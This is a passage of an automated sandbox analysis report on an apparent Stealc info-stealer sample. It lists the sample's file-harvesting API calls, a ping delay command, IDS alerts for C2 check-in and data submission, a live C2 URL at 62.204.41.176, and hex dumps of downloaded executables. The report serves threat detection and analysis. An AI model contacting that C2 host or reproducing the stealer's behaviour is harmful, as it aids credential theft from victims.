                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,16_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,16_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,16_2_00413EA0
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\464151Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\464151\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49980 -> 62.204.41.176:80
                    Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49980 -> 62.204.41.176:80
                    Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 62.204.41.176:80 -> 192.168.2.5:49980
                    Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49980 -> 62.204.41.176:80
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 62.204.41.176:80 -> 192.168.2.5:49980
                    Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49980 -> 62.204.41.176:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://62.204.41.176/edd20096ecef326d.php
                    Source: Malware configuration extractorURLs: http://62.204.41.176/edd20096ecef326d.php
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:28:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 10 Oct 2024 07:15:01 GMTETag: "53e00-6241a210243f2"Accept-Ranges: bytesContent-Length: 343552Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 aa ba 9b 35 ee db f5 66 ee db f5 66 ee db f5 66 f0 89 71 66 f4 db f5 66 f0 89 60 66 fe db f5 66 f0 89 76 66 a4 db f5 66 c9 1d 8e 66 ed db f5 66 ee db f4 66 9f db f5 66 f0 89 7f 66 ef db f5 66 f0 89 61 66 ef db f5 66 f0 89 64 66 ef db f5 66 52 69 63 68 ee db f5 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 71 3f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 03 00 00 dc 0f 00 00 00 00 00 17 12 00 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 a5 78 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 36 03 00 28 00 00 00 00 20 11 00 e0 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 34 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 1f 00 00 00 20 03 00 00 20 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c a5 0d 00 00 40 03 00 00 14 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 69 77 61 70 65 68 00 04 00 00 00 f0 10 00 00 04 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 00 11 00 00 06 00 00 00 46 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 69 6d 00 00 00 00 00 04 00 00 00 10 11 00 00 04 00 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 ec 14 00 00 20 11 00 00 ee 01 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:28:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:03 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 